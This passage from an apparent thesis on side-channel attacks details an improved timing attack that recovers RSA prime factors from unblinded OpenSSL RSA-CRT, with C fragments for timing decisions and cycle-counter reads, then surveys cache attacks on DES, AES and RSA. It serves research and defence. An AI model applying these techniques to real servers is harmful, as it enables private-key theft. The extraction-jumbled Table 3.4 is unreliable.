∆_BB = | Σ_{j=0}^{N−1} Time((g + j)R^{-1} (mod n)) − Σ_{j=0}^{N−1} Time((g_hi + j)R^{-1} (mod n)) |.      (3.4)

∆_BB becomes 'small' when q_k = 1, whereas a 'large' value indicates that q_k = 0 [21]. Our pendant is

∆ = Σ_{j=0}^{N−1} Time((h + j)(R^{0.5})^{-1} (mod n)) − Σ_{j=0}^{N−1} Time((h_hi + j)(R^{0.5})^{-1} (mod n)),      (3.5)

where we omit the absolute value. Since (u + x)^2 − u^2 ≈ 2x√q for u ∈ N(h, N) or u ∈ N(h_hi, N), the value ∆ can only be used to retrieve the bits i ≤ 256 − 1 − log2(N). In fact, it is recommended to stop at least two or three bits earlier. The remaining bits up to the 256th bit of q can be determined by either using the former equation or searching exhaustively.

Network traffic and other delays affect the timing measurements, because we can only measure response times rather than mere encryption times. For that reason, identical input values are queried S many times, where S is one of the parameters in the BB-attack, to decrease the effect of outliers in [21]. We drop this parameter in our attack, because increasing the number of different queries serves the same purpose as well. If ∆_BB or |∆| is 'large' (in relation to the neighborhood size N), that is, if ∆_BB > N · th_{BB;i}, resp. |∆| > N · th_i, for suitable threshold values th_{BB;i} and th_i (both depending on the index i), the attacker guesses q_i = 0; otherwise she decides for q_i = 1.
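A direct implementation of this threshold decision based on (3.5) could look as follows. The routine time_for_neighbor() is a placeholder for the measurement of a single response time and does not exist in any library; the threshold th_i has to be calibrated empirically as discussed above.

/* Hypothetical measurement routine: returns the response time (in clock
 * cycles) observed for the j-th neighbor of h (bound == 0) or of h_hi
 * (bound == 1); the queries themselves are built as sketched in Section 3.3. */
extern double time_for_neighbor(int bound, unsigned j);

/* Threshold decision on bit q_i based on (3.5): a 'large' |Delta| relative to
 * the neighborhood size N indicates q_i = 0.                                  */
static int decide_bit_by_sums(unsigned N, double th_i)
{
    double delta = 0.0;
    for (unsigned j = 0; j < N; j++)
        delta += time_for_neighbor(0, j) - time_for_neighbor(1, j);
    return (delta > N * th_i || delta < -(double)N * th_i) ? 0 : 1;
}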
On the other hand, sequential sampling exploits the fact that already a fraction of both neighborhood values usually yields the correct decision with high probability. We can apply a particular decision rule not to sums of timings (i.e., to ∆) but successively to the individual timing differences

∆_j = Time((h + j)(R^{0.5})^{-1} (mod n)) − Time((h_hi + j)(R^{0.5})^{-1} (mod n))      (3.6)

for j = 0, 1, . . . , N_max. The attacker proceeds until the difference

#{j | q̃_{i;j} = 0} − #{j | q̃_{i;j} = 1} ∈ {m1, m2},      (3.7)

or a given maximum neighborhood size N_max is reached. The term q̃_{i;j} denotes the jth individual decision for q_i, and the numbers m1 < 0 and m2 > 0 are chosen with regard to the concrete decision rule. If the process ends at m1 (resp. at m2), the attacker assumes that q_i = 1 (resp. that q_i = 0) is true. If the process terminates because the maximum neighborhood size has been exceeded, the attacker's decision depends on the difference at that time and on the concrete individual decision rule (cf. [36], Chap. XIV, and [85], Sect. 7).

The fact that the distribution of the differences varies in the course of the attack causes another difficulty. As pointed out earlier, we do not assume that the attacker has full knowledge of the implementation details and hence full control over the changes of the distribution. A possible individual decision rule could be, for instance, whether the absolute value of an individual time difference exceeds a particular bound th_i (→ decision q̃_{i;j} = 0). The attacker updates this threshold value whenever he assumes that a current bit q_i equals 1. The new threshold value depends on the old one and the actual normalized value |∆|/N_e, where N_e denotes the number of exploited individual timing differences.

We use an alternative decision strategy that is closely related to this approach. For k ∈ {0, 1}, we define

f_{i;≥;k} = Pr(∆_j ≥ 0 | q_i = k),      (3.8)

and similarly

f_{i;<;k} = Pr(∆_j < 0 | q_i = k).      (3.9)

We want to mention that the following inequality surely holds due to the reasons given above:

max{f_{i;≥;0}, f_{i;<;0}} > max{f_{i;≥;1}, f_{i;<;1}}.      (3.10)

The right-hand maximum should be close to 0.5. We subtract the number of negative timing differences from the number of non-negative ones. The process terminates when this difference equals m1 = −D or m2 = +D > 0, or when a particular maximum neighborhood size N_max is reached. For N_max = ∞, the process will always terminate at either −D or D. However, the average number of steps should be smaller when q_i = 0, because of the fact highlighted in equation (3.10). Consequently, if D and N_max are chosen properly, a termination at D or −D is a strong indicator for q_i = 0, whereas reaching N_max without termination indicates that q_i = 1. We use this strategy in our implementation and the results are presented in §7.

We interpret our decision procedure as a classical gambler's ruin problem. Formula (3.11) below facilitates the selection of suitable parameters D and N_max. If f_{i;≥;k} ≠ 0.5, formula (3.4) in [36] (Chap. XIV, Sect. 3, with z = D, a = 2D, p = f_{i;≥;k} and q = 1 − p) yields the average number of steps (i.e., the number of time differences to evaluate) until the process terminates at −D or D, assuming N_max = ∞. In fact,

E(Steps) = D / (f_{i;<;k} − f_{i;≥;k}) − (2D / (f_{i;<;k} − f_{i;≥;k})) · (1 − (f_{i;<;k}/f_{i;≥;k})^D) / (1 − (f_{i;<;k}/f_{i;≥;k})^{2D}).      (3.11)

Similarly, formula (3.5) in [36] yields

E(Steps) = D^2   if f_{i;≥;k} = 0.5.      (3.12)

These formulae can be used to choose the parameters D and N_max. A deeper analysis of the gambler's ruin problem can be found in [36], Sect. XIV. The probabilities f_{i;≥;k} vary with i and this fact makes the situation more complicated. On the other hand, if D and N_max are chosen appropriately, the decision procedure should be robust against small changes of these probabilities.
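As an illustration of how (3.11) and (3.12) can be used when selecting D and N_max, the following small C function is a direct transcription of the two formulae; f stands for f_{i;≥;k}, and since the counting process starts in the middle between the two absorbing barriers, exchanging f and 1 − f gives the same value.

#include <math.h>

/* Expected number of individual timing differences until the counting process
 * first hits -D or +D, assuming N_max = infinity; f is f_{i;>=;k}, the
 * probability of a non-negative difference for the bit value k considered.   */
static double expected_steps(double f, int D)
{
    if (f == 0.5)
        return (double)D * (double)D;                 /* formula (3.12)       */
    double q = 1.0 - f;                               /* = f_{i;<;k}          */
    double r = pow(q / f, D);                         /* (f_{i;<;k}/f_{i;>=;k})^D */
    return D / (q - f) - (2.0 * D / (q - f)) * (1.0 - r) / (1.0 - r * r);     /* (3.11) */
}

For example, with the empirical values of Table 3.3 for the interval [64, 95] and D = 17, expected_steps(0.7123, 17) is approximately 40 and expected_steps(0.5085, 17) is approximately 281, i.e., the expected effort for q_i = 0 and q_i = 1, respectively, which agrees with the corresponding entries of Table 3.4.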
3.4. Implementation Details

We performed our attack against OpenSSL version 0.9.7e with disabled blinding, which would otherwise prevent the attack [71]. We implemented a simple TCP server and a client program, which exchange ASCII strings during the attack. The server reads the strings sent by the client, converts them to OpenSSL's internal representation, and sends a response after decrypting them. The attack is actually performed by the client, which calculates the values to be decrypted, prepares and sends the messages, and makes guesses based on the time spent between sending a message and receiving the response.

We used the GNU Multi Precision arithmetic library, shortly GMP, to compute the square roots, i.e., ⌊√g⌋ and ⌊√g_hi⌋ [40]. The source code was compiled using the gcc compiler with default optimizations. All of the experiments were run under the configuration shown in Table 3.1. We used random keys generated by OpenSSL's key generation routine. We measured the time in terms of clock cycles using the Pentium cycle counter, which ticks 3.06 billion times per second on our machine. We used the "rdtsc" instruction available in Pentium processors to read the cycle counter and the "cpuid" instruction to serialize the processor.

Operating System:       RedHat Workstation 3
CPU:                    dual 3.06 GHz Xeon
Compiler:               gcc version 3.2.3
Cryptographic Library:  OpenSSL 0.9.7e
TABLE 3.1. The configuration used in the experiments

Serialization of the processor was employed to prevent out-of-order execution in order to obtain more reliable timings. Serialization was also used by Brumley and Boneh in their experiments [21]. There are 2 parameters that determine the total number of queries required to expose a single bit of q.

• Neighborhood size N_max: We measure the decryption time in the neighborhoods N(h; N_max) = {h, h+1, . . ., h+N_max−1} and N(h_hi; N_max) = {h_hi, h_hi+1, . . ., h_hi+N_max−1} for each bit of q we want to expose.

• Target difference D: The difference between the number of time differences that are less than zero and the number of time differences that are larger than zero. If we reach this difference among N_max many timings, we guess the value of the bit as 0. Otherwise, our guess becomes q_i = 1.

The total number of queries and the probability of an error for a single guess depend on these parameters. The sample size used by [21] is no longer a parameter in our attack. In the following section, we present the results of the experiments that explore the optimal values for these parameters. In our attack, we try to expose all of the bits of q between the 5th and the 245th bit. The first few bits are assumed to be determinable in the same way as in [21]. The remaining 11 bits after the 245th bit can easily be found by using either an exhaustive search or the BB-attack itself.

                   new attack |∆|/N                 BB-Attack ∆_BB/N
interval      bits = 0   bits = 1   0-1 gap    bits = 0   bits = 1   0-1 gap
[5, 31]          5871       3744      2127        3423       2593       830
[32, 63]        42778       4003     38775       15146       3455     11691
[64, 95]        40572       4310     36263       15899       3272     12627
[96, 127]       41307       3995     37313       18886       3580     15306
[128, 159]      45168       2736     42431       20877       2933     17945
[160, 191]      44736       3082     41654       24513       2479     22034
[192, 223]      37141       1755     35385       21550       1977     19573
[224, 245]      21936       2565     19371       27702       4728     22974
TABLE 3.2. Average ∆ and ∆_BB values and 0-1 gaps. The values are given in terms of clock cycles.

3.5.
Experimental Results In this section we present the results of our experiments in four subsections. First, we compare our attack to BB-attack. Then, we give the details of our attack including error probability, parameters and the success rate in the following subsections. We also show the distribution of the time differences, which is the base point of our decision strategy. The characteristics of the decryption time may vary during the course of the attack, especially around the multiples of the machine word size. Therefore, we separated the bits of q into different groups, which we call intervals. The interval [i,j] represents all the bits between ith and j th bit, inclusively. In our experiments, we used intervals of 32 bits: [32,63], [64, 95], ...etc. All of the results we present in this paper were obtained by running our attack as an inter-process attack. It is stated in [21] that it is sufficient to increase the sample size to convert an inter-process attack into an inter-network attack. In our case, either a sample size can be used as a third parameter or the neighborhood size and the target difference can be adjusted to tolerate the network noise. 3.5.1. Comparison of our attack and BB-attack In [21], Brumley and Boneh calculated the time differences, denoted by ∆BB , for each bit to use as an indicator for the value of the bit. The gap between ∆BB when qi is 0 and when it is 1 is called the zero-one gap in [21]. Therefore, we want to compare both attacks in terms of zero-one gap. We run both attacks on 48 10 different randomly chosen keys and collected the time differences for each bit in [5, 245] using a neighborhood size of 5000 and a sample size of 1. Table 3.2 shows the average statistics of the collected values. The zero-one gap is 114% larger in our attack, which means a smaller number of queries are required to deduce a key in ours. 3.5.2. The details of our attack Our decision strategy for each single bit consists of: • Step 1: Sending the query for a particular neighbor and measuring the time difference ∆j . • Step 2: Comparing ∆j with zero and updating difference between the number of ∆j values that are less than zero and the number of ∆j values that are larger than zero. • Step 3: Repeating first 2 steps until we reach the target difference, D, or a maximum of Nmax times. • Step 4: Making the guess qi = 0, if the target difference is reached. Otherwise the guess turns out to be qi = 1. Note that we normally send only one query in Step 1, although we use a difference of two timings in our decision. This is because one of the timings we use to compute the difference has to be the one used for the decision of the previous bit. Since we halve the interval, which q is in, in each decision step, only one of the bounds, either the upper or lower one, will change. The timings for the bound that does not change can be reused during the decision process 49 . FIGURE 3.2. The distribution of ∆j in terms of clock cycles for 0 ≤ j ≤ 5000, sorted in descending order, for the sample bit q61 . The graph on the left shows this distribution when q61 = 1. The distribution on the right is observed when q61 = 0. of the next bit. Therefore sending one query for a particular neighbor becomes sufficient by storing the data of the previous iteration. Of course, there are some cases that we have to send both queries, specifically when we exceed the total number of neighbors used in the previous decision step. 
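The time differences in Step 1 are obtained with the serialized cycle-counter reads described in Section 3.4. A minimal gcc inline-assembly sketch of such a read is given below; it is only meant to illustrate the cpuid/rdtsc combination, and the exact register constraints may need to be adapted to the compiler and to a 32-bit or 64-bit build.

#include <stdint.h>

/* Read the time-stamp counter after serializing the processor with cpuid, so
 * that earlier instructions cannot be reordered past the measurement point.  */
static inline uint64_t serialized_rdtsc(void)
{
    uint32_t lo, hi;
    __asm__ __volatile__("xorl %%eax, %%eax\n\t"
                         "cpuid\n\t"
                         "rdtsc"
                         : "=a"(lo), "=d"(hi)
                         :
                         : "rbx", "rcx", "memory");
    return ((uint64_t)hi << 32) | lo;
}

/* Usage: t0 = serialized_rdtsc(); send the query and wait for the response;
 *        t1 = serialized_rdtsc(); the timing sample is t1 - t0.              */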
However, just removing the redundant queries, which can also simply be applied to the BB-attack, almost doubles the performance.

3.5.2.1. The distribution of time differences

We use the distribution of the time differences for our decision purposes. Whenever q_i = 1, the numbers of time differences lying above and below zero are very close to each other. However, when q_i = 0, the difference between these numbers becomes larger (see Figure 3.2).

interval      max{f_{i;≥;0}, f_{i;<;0}}   max{f_{i;≥;1}, f_{i;<;1}}
[5, 31]               0.5315                      0.5040
[32, 63]              0.6980                      0.5097
[64, 95]              0.7123                      0.5085
[96, 127]             0.7079                      0.5079
[128, 159]            0.7300                      0.5080
[160, 191]            0.7349                      0.5090
[192, 223]            0.6961                      0.5077
[224, 245]            0.6431                      0.5194
TABLE 3.3. The percentage of the majority of time differences that are either positive or negative (empirical values)

3.5.2.2. Error probabilities and the parameters

When q_i = 1, approximately half of the time differences become positive and the other half become negative. If q_i is 0, the majority of the time differences becomes either positive or negative. We determined the percentage of that majority in order to calculate the error probability for a single time difference. Table 3.3 shows estimators for max{f_{i;≥;0}, f_{i;<;0}} and max{f_{i;≥;1}, f_{i;<;1}}. These statistics were obtained using 10 different keys and a neighborhood size of 50000 for [5, 31] and 5000 for the other intervals.

The empirical parameters that yield the intended error probabilities are shown in Table 3.4. We present three different sets of parameters, one for each accuracy of 95%, 97.5%, and 99%. We used these parameters to perform our attack on several different keys. Note that inserting the values of Table 3.3 into formula (3.11) yields the expected values E(Steps) for q_i = 0 and q_i = 1, resp. The probabilities for correct guesses (95%, 97.5%, 99%) were gained empirically. We employed the concept of 'confirmed intervals' (refer to Section 3.1) to detect the errors that occurred during the attack. We could recover from such errors using the same concept and could expose each bit of q in the interval [5, 245] for any key we attacked.

Brumley and Boneh used 1.4 million queries in [21] (interprocess attacks) and they indicated that their attack required nearly 359000 queries in the more favourable case when the optimizations were turned off by the flag (g). We could perform our attack with as few as 47674 queries for a particular key. The performance of these timing attacks is highly environment dependent, therefore it is not reliable to compare the figures of two different attacks on two different systems. Despite this fact, it is obvious by the arguments explained above (improving the signal-to-noise ratio (cf. also Table 3.2), reusing previous queries, sequential sampling) that our attack is significantly better than the previous one.

We performed interprocess attacks. Clearly, in network attacks the noise (caused by network delay times) may be much larger, and hence an attack may become impractical even if it is feasible as an interprocess attack under the same environmental conditions. However, this aspect is not specific to our improved variant but a general feature that affects the BB-attack as well.

3.6. Conclusion

We have presented a new timing attack against unprotected SSL implementations of RSA-CRT. Our attack exploits the timing behavior of the Montgomery multiplications performed during the table initialization phase of the sliding window exponentiation algorithm.
It is an improvement of Brumley and Boneh attack, 52 Accuracy = 95% Accuracy = 97.5% Accuracy = 99% parameters E(Steps) for parameters E(Steps) for parameters E(Steps) for interval D Nmax qi = 0 qi = 1 D Nmax qi = 0 qi = 1 D Nmax qi = 0 qi = 1 [5, 31] 63 1850 1975 1077 4220 230 6720 3646 27480 [32, 63] 25 131 63 579 29 163 73 761 34 240 85 1012 [64, 95] 17 67 40 281 36 192 84 1154 46 450 108 1767 [96, 127] 18 70 43 315 26 130 62 640 44 250 105 1674 [128, 159] 16 50 34 250 31 271 67 889 41 299 89 1477 [160, 191] 21 107 44 421 25 127 53 585 29 169 61 [192, 223] 24 126 61 551 36 264 91 1179 49 333 124 2033 [224, 245] 30 230 104 636 31 259 365 150 1032 998 3667 68 108 667 43 TABLE 3.4. Columns 2 and 3 show the parameters that can be used to yield the intended accuracy. The last columns give the expected number of steps for Nmax = ∞, calculated using Formula (3.11), to reach the target difference D. 771 53 which exploits Montgomery multiplication in the exponentiation phase of the same algorithm. Changing the target phase of the attack yields an increase on the number of multiplications that provide useful information to expose one of the prime factors of RSA moduli. Only this change alone gives an improvement by a factor of more than 5 over BB-attack. We have also presented other possible improvements, including employing sequential analysis for the decision purposes and removing the redundant queries that can also be applied to BB-attack. If we use only the idea of removing redundant queries from BB-attack, this will double the performance by itself. Our attack brings an overall improvement by a factor of more than 10. 54 4. SURVEY ON CACHE ATTACKS As we mention earlier in this document, traditional cryptography considers cryptosystems as perfect mathematical models and deals only with these models. However, any cryptosystem needs an implementation and a physical device to run on. The implementations of cryptosystems may leak information through so-called side channels due to the physical requirements of the device, e.g., power consumption, electromagnetic emanation and/or execution time. In this chapter, we focus on a specific type of side-channel attacks that takes advantage of the information which leaks through the cache architecture of a CPU. To be more precise, we describe cache-based attacks in the literature. Timing attacks on various cryptosystems, including RSA and DiffieHellman, were introduced in 1996 by Kocher [59]. Several papers have been published on the subject since then, e.g., [34, 85, 21, 6]. In 1999, Koeune and Quisquater developed a timing attack on a careless implementation of AES [61], which has significantly been improved in [88]. A timing attack against RSA on a smart card was developed in [34]. Various timing attacks were significantly improved or discovered by employing formal statistical models and efficient decision strategies in [85, 6, 88, 87, 89, 86]. All of the timing attacks mentioned above exploit the variations in execution time caused by running different execution paths due to the conditional branches, e.g., due to the extra reduction step of Montgomery Multiplication (c.f. Sections 2.1.3, 3.1, 3.2, and 3.3). However, it is still possible to attack an implementation even if the execution path is always same. A cache-based attack, abbreviated to “cache attack” from here on, exploits the cache behavior of a cryp- 55 tosystem by obtaining the execution time and/or power consumption variations generated via cache hits and misses. 
The feasibility of the cache attacks was first mentioned by Kocher and then Kelsey et al. in [59, 54]. Page described and simulated a theoretical cache attack on DES [75]. The first actual cache attacks were implemented by Tsunoo et al. [101, 100]. The main focus of those papers was on DES [20]. Tsunoo et al. claimed that the search space of the AES key could be narrowed to 32 bits using cache attacks; however they did not detail their attack. Bernstein showed the vulnerability of AES by performing a cache attack on OpenSSL AES implementation [14]. The attack he developed is a template attack [24] and requires prior knowledge of the timing behavior of the cipher under the same known key on an identical platform. In this sense, his attack is not very practical, because the required information is not directly available to an attacker. Efficient cache attacks on AES were presented by Osvik et al. in [72, 73]. They described and simulated several different methods to perform local cache attacks. They made use of a local array, and exploited the collisions between AES table lookups and the accesses to this array. None of their methods can be used as a remote attack, e.g., an attack over a local network, unless the attacker is able to manipulate the cache remotely. None of the mentioned papers, except [14], considered whether a remote cache attack is feasible. Although Bernstein claimed that his attack revealed the key of a remote cryptosystem, his experiments were purely local [14]. The server received the messages, processed them and sent the exact execution time to the attacker client in his attack model. Therefore, there were neither transmission delays nor network stack delays in the measurements. 56 Despite of Bleichenbacher’s attack ( [16]), which exploited weak implementations of the SSL handshake protocol, the vulnerability of software systems against remote timing attacks was not known until Brumley and Boneh performed an attack over a local network in ( [21]). They mimicked the attack introduced in [85] to show that the RSA implementation of OpenSSL [71], which is the most widely used open-source crypto library, was not immune to such attacks at that time. An improved version of this attack is introduced in [6] and also given in Section 3.3. In this chapter, we give more details of the cache attacks mentioned above. 4.1. The Basics of a Cache Attack A cache is a small and fast storage area used by the CPU to reduce the average time to access main memory (c.f. Section 2.3.1). Cryptosystems have data-dependent memory access patterns. Cache architectures leak information about the cache hit/miss statistics of ciphers through side channels, e.g., execution time and power consumption. Therefore, it is possible to exploit cache behavior of a cipher to obtain information about its memory access patterns, i.e. indices of S-box and table lookups. Cache attacks rely on the cache hits and misses that occur during the encryption / decryption process of the cryptosystem. Even if the same instructions are executed for any particular (plaintext, cipherkey) pair, the cache behavior during the execution may cause variations in the program execution time and power consumption. Cache attacks try to exploit such variations to narrow the exhaustive search space of secret keys. 57 Theoretical cache attacks were first described by Page in [75]. Page characterized two types of cache attacks, namely trace-driven and time-driven. 
In trace-driven attacks, the adversary is able to obtain a profile of the cache activity of the cipher. This profile includes the outcomes of every memory access the cipher issues in terms of cache hits and misses. Therefore, the adversary has the ability to observe (e.g.) if the 2nd access to a lookup table yields a hit and can infer information about the lookup indices, which are key dependent. This ability gives an adversary the opportunity to make inferences about the secret key. Time driven attacks, on the other hand, are less restrictive since they do not rely on the ability of capturing the outcomes of individual memory accesses. Adversary is assumed to be able to observe the aggregate profile, i.e., total numbers of cache hits and misses or at least a value that can be used to approximate these numbers. For example, the total execution time of the cipher can be measured and used to make inferences about the number of cache misses in a time-driven cache attack. Time-driven attacks are based on statistical inferences, and therefore require much higher number of samples than trace-driven attacks. We have recently seen another type of cache attacks that can be named as “access-driven” attacks. In these attacks, the adversary can determine the cache sets that the cipher process modifies. Therefore, he can understand which elements of the lookup tables or S-boxes are accessed by the cipher. Then, the candidate keys that cause an access to unaccessed parts of the tables can be eliminated. In the rest of this section, we present the basic models of cache attacks. The attacks in the literature are built upon these models. 58 . FIGURE 4.1. Cache Attack Model-1 4.1.1. Basic Attack Models In this subsection we present two different models that are employed in various cache attacks in the literature. The first model mainly corresponds to access-driven cache attacks, while the second model is the basic model of timedriven and trace-driven attacks. 4.1.1.1. Model-1 We use Figure 4.1 to explain this attack model. We have a main memory that stores data of each process running on the system and a cache between the memory and the CPU. Each square in the cache represents a cache block and each column represents a different cache set. For example, this cache has 2 blocks in each column, so it is 2-way set associative. The blocks in a column of the memory map only to the corresponding cache set in the same column of the cache. Mapping a memory block to a cache set means that this particular cache block can only be stored in that set of the cache. As an example, the garbage data and data structure 1 can only be in the dark area of the cache in Figure 4.1. 59 Assume that we have two different processes, the cryptosystem and a malicious process, called Spy process, running on the same machine. Cryptosystem process contains different internal data structures and it accesses some or all of these data structures, depending on the value of the secret key. The adversary can easily understand if the cipher has at least one access to data structure 1 during an encryption, because accesses to garbage data and data structure 1 creates external collisions. A collision is the situation that occurs when an attempt is made to store two or more different data items at a location that can hold only one of them. We use the term “external collision” if these data items belong to different processes. On the other hand, if the data items are of the same process, we call this situation as “internal collision”. 
In our case, the cache cannot store the garbage data and data structure 1 at the same time, so an access to the garbage data may evict data structure 1 from the cache and vice versa. This fact enables an adversary to devise an attack on the cryptosystem process as follows. When the adversary reads the garbage data, CPU loads the content of it into the cache (Figure 4.2a). If the cryptosystem is run under this initial cache state, there are two possible cases: 1. Case: Data structure 1 is accessed by the cipher. 2. Case: Data structure 1 is not accessed by the cipher. In Case 1 (Case 2, resp.) the final state of the first four cache sets just after the encryption becomes like Figure 4.2b (Figure 4.2c, resp.). In the first case, the cipher accesses data structure 1 and this access changes the content of the first four cache sets as shown in the figure. Otherwise, these sets remain unchanged. When 60 . FIGURE 4.2. Cache states the adversary reads the garbage data again after the encryption, he can understand which case was true, because reading the garbage data creates some cache misses and thus takes longer in Case 1. Similarly, at least in theory, the adversary can use the same technique for other data structures and reveal the entire set of items that are accessed during an encryption. Since this set depends on the secret key value, he can gain invaluable information to narrow the exhaustive search space. This model describes an active attack where the adversary must be able to control the content of the cache. The cache attacks rely on this basic model corresponds to access-driven types. Percival’s attack on RSA [80](c.f. Subsection 4.2.4), OST and Neve et. al.’s attacks on AES [72, 73, 67] (c.f. Subsections 4.2.5 and 4.2.6) and the power attack by Bertoni et al. [15] (c.f. Subsection 4.2.7) use this attack model. 61 4.1.1.2. Model-2 Assume there are two accesses to the same table as in Figure 4.3. Let Pi and Ki be the ith byte of the plaintext and cipherkey, respectively. In this paper, each byte is considered to be either an 8-digit radix-2 number, i.e., {0, 1}8 , that can be added together in GF(28 ) using a bitwise exclusive-or operation or an integer in [0, 255] that can be used as an index. For the rest of this paper, we assume that each plaintext consists of a single message block unless otherwise stated. The size of the message block depends on the particular cryptosystem in use, e.g. it is 128, 192, or 256 bits for AES, 64 bits for DES, and usually 512 or 1024 bits for RSA. The structure shown in the figure uses different bytes of the plaintext and the cipherkey as inputs to the function that computes the index of each of these two accesses. If both of them access to the same element of the table, the latter one will find the target data in the cache and result a cache hit; therefore requires a shorter execution time. Then, the key byte difference K1 ⊕ K2 can be derived from the values of plaintext bytes P1 and P2 using the equation: P 1 ⊕ K1 = P 2 ⊕ K 2 ⇒ P 1 ⊕ P 2 = K1 ⊕ K2 . In trace-driven attacks, we already assume that the adversary can directly understand if the latter access results a hit, thus can directly obtain K1 ⊕ K2 . This goal is more complicated in time-driven attacks. We need to use a large sample to realize an accurate statistics of the execution. In our case, if we collect a sample of different plaintext pairs with the corresponding execution time, the plaintext byte difference, P1 ⊕ P2 , that causes the shortest average execution 62 . FIGURE 4.3. 
Two different accesses to the same table. time will give the correct key byte difference assuming a cache hit decreases the overall execution time. However, in a real environment, even if the latter access is to a different element other than the exact target of the former access, a cache hit may still occur. Any cache miss results the transfer of an entire cache line, not only one element, from the main memory. Therefore, if the former access has a target, which lies in the same cache line of the previously accessed data, a cache hit will occur. In that case, we can still obtain the key byte difference partially as follows: Let δ be the number of bytes in a cache line and assume that each element of the table is k bytes long. Under this situation, there are δ/k elements in each line, which means any access to a specific element will map to the same line with (δ/k − 1) different other accesses. If two different accesses to the same array read the same cache line, the most significant parts of their indices, i.e., all of the bits except the last ` = log2 (δ/k) bits, must be identical.1 Using this fact, we can find 1 We assume that lookup tables are aligned in the memory, which is the case most of the time. If they are not aligned, this will indeed increase the performance of the attack as mentioned in [73]. 63 the difference of the most significant part of the key bytes using the equation: hP1 i ⊕ hP2 i = hK1 i ⊕ hK2 i , where hAi stands for the most significant part of A. Indices of table lookups are usually more complex functions of the plaintext and the cipherkey than only bitwise exclusive-or of their certain bytes. The structure of these functions determines the performance of the attack, i.e., the amount of reduction in the exhaustive search space. The basic idea presented above can be adapted to any such function in order to develop successful attacks. Let f1 (P, K 0 ) and f2 (P, K 00 ) be two different functions that specify the indices of two different accesses to the same table, where K 0 and K 00 are certain parts of the same cipherkey. • If hf1 (P, K 0 )i = hf2 (P, K 00 )i (4.1) for each plaintext in a large sample, then the expected timing characteristics of this set, e.g., median or average execution time, will be different than that of a random sample. When we consider this fact, a simple attack method becomes the following: 1. Phase 1: Obtain a sample of N (plaintext, encryption time) pairs generated under the same target key. f0 and K f00 stand 2. Phase 2: Perform an exhaustive search on K 0 and K 00 . Let K for the candidate values of K 0 and K 00 , respectively. Divide the entity of all (plaintext, encryption time) pairs into different sets, one for each candidate f0 , K f00 ), and put all plaintexts in this set that satisfy equation 4.1 pair (K 64 f0 , K f00 ). Note that these sets need not be mutually disjoint, i.e., a for (K f0 , K f00 ) values in particular plaintext may obey equation 4.1 for different (K which case it will be an element of all of these sets (one set for each different f0 , K f00 ) value). (K 3. Phase 3: Obtain the timing characteristics of each set. If all of these characteristics, except one, is very similar to each other, the one with the different f0 = K 0 characteristics has to be the set of the correct candidates, i.e., when K f00 = K 00 . and K 4.2. Cache Attacks in the Literature In this section we summarize the cache attacks in the literature. 
Our own attacks are only briefly mentioned in this chapter and described in the next chapters in detail. 4.2.1. Theoretical Attack of D. Page D. Page described and simulated a theoretical trace-driven cache attack on DES [75]. We do not present the details of DES algorithm [20] in this document, but we give the necessary information to understand the basic idea of this attack. In DES, there are 16 rounds of computations and 8 different S-boxes. In every round, there is an access to each of these 8 S-boxes as shown in Figure 4.4. The indices used in first two rounds are given below: I0 = K0 ⊕ E(R0 ) I1 = K1 ⊕ E(L0 ⊕ P (S(K0 ⊕ E(R0 )))) , 65 . FIGURE 4.4. DES S-Box lookup. where E is the expansion function and P is the permutation function. These functions are reversable (injective), i.e., given the output, the inputs of these functions can be calculated. S is the function implemented in S-boxes. R0 and L0 are the right and left halves of the input plaintext after the application of the initial permutation. K0 and K1 are the round keys derived from the actual key, K. If the adversary can capture the profile of the cache activity during the second round, i.e., the outcomes of S-box lookups using index I1 , then he can correlate I0 and I1 . From this correlation, he can partially recover the bits of K0 and K1 , thus some bits of the actual key. The reader should notice that the values of R0 and L0 are known by the adversary, i.e. it is a known or chosen plaintext attack. More details of the attack can be found in the original paper [75]. This attack is hypothetical, because Page just assumed that it was possible to capture the cache profile and did not explain how. Later, Bertoni et al. and Lauradoux showed that it was possible to capture the cache traces of a cryptosystem using power analysis [15, 62], c.f. Sections 4.2.7 and 4.2.8. Page’s attack requires capturing 210 encryption profiles to reduce the search space from 256 bits to 232 bits. Page also discussed possible countermeasures against cache attacks in [75, 76, 80]. 66 4.2.2. First Practical Implementations Cache attacks were first implemented by Tsunoo et al. [101, 100]. These attacks are time-driven cache based timing attacks built upon the last attack model described above. Tsunoo et al. developed different attacks on various ciphers, including MISTY1 [101, 63], DES and Triple-DES [100, 20]. The original attack on MISTY1 proposed in [101] is improved later in [102]. In this paper, we only describe the attack on DES. Their attack focuses on the indices of first and last round S-box lookups. The adversary collects a sample of plaintext and the corresponding encryption times and analyzes this data to find correlations between first and last round S-box indices, considering each of 8 S-boxes, S0 through S7. From the correlations found, he can make partial inferences about the secret key. Note that this attack employs statistical inferences, and thus its success is probabilistic. Their experiments show that collecting 223 known plaintext reduces the search space down to 224 bits with a success rate of higher than 90%. 4.2.3. Bernstein’s Attack Bernstein showed the vulnerability of AES by performing a cache attack on OpenSSL’s AES implementation [14]. The attack he developed is a template attack [24] and requires prior knowledge of the timing behavior of the cipher under the same known key on an identical platform. There are different phases of this attack. 
In the first phase, profiling or learning phase, the attacker establishes the profiles of the execution time of the cipher under known secret keys. To establish such profiles, it is necessary to know the value of the test keys and simulate the execution of the cipher for a sample of 67 known plaintext on a platform exactly identical to the server. Even the software installed on the target and test platforms need to be same [68, 66]. After establishing each profile, the attacker can apply the actual attack to the server. He sends random plaintext to the server and measures the encryption time of each plaintext. Doing so, he can establish the profile of the actual secret key. Then he can find correlations of the actual profile and the profiles captured during the profiling phase, each profile typical for a particular subkey. From these correlation, he tries to predict the parts of the secret key or a set of candidate keys. He can find the actual key using a brute-force attack on the narrowed search space. Bernstein showed the vulnerability of AES software implementations on various platforms [14]. There was a common belief that Bernstein’s attack is a realistic remote attack and it can recover an entire AES key. However, Neve et al. showed in [68] that this is only a fallacy. They described the circumstances in which the attack might work and also the limitations of the Bernstein attack. The details of this analysis can also be found in [66]. 4.2.4. Percival’s Hyper-Threading Attack on RSA Colin Percival developed a noteworthy cache attack on OpenSSL’s implementation of RSA [82], which is the most widely used public-key cryptosystem. This attack is built upon the first attack model presented above (cf. Subsection 4.1.1.1). In Subsection 4.1.1.1, we describe a general attack model that can work in almost any environment. But, such attacks become very powerful especially on simultaneous multithreading environments, because the adversary can run the 68 malicious process, i.e., Spy process, simultaneously with the cipher. Running these processes simultaneously allows an attacker to obtain not only the set of data structures accessed by the cipher but also the approximate time that each access occurs. In Percival’s attack, we run a spy process simultaneously with the server. This process continuously reads each cache set in the same order and measures the read time of each of these cache sets as long as the cipher process 